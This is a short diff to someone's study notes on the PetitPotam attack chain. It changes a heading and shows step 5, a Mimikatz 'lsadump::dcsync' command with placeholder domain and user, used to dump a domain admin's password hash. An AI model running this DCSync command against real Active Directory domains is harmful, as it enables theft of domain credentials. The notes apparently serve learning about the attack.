0xKourama/Elbanna-NP-Notes/Learning/Articles/PetitPotam/PetitPotam.md

 ![got-dc2-tgt](got-dc2-tgt.jpg)

-## 5. *Having the TGT in memory,* use Mimikatz.exe to do a DCSync attack
+## 5. *Having the TGT in memory,* use Mimikatz to do a DCSync attack
 `lsadump::dcsync /domain:<DOMAINFQDN> /user:<TARGET_USER>`

 ![dcsync-for-domain-admin-hash](dcsync-for-domain-admin-hash.jpg)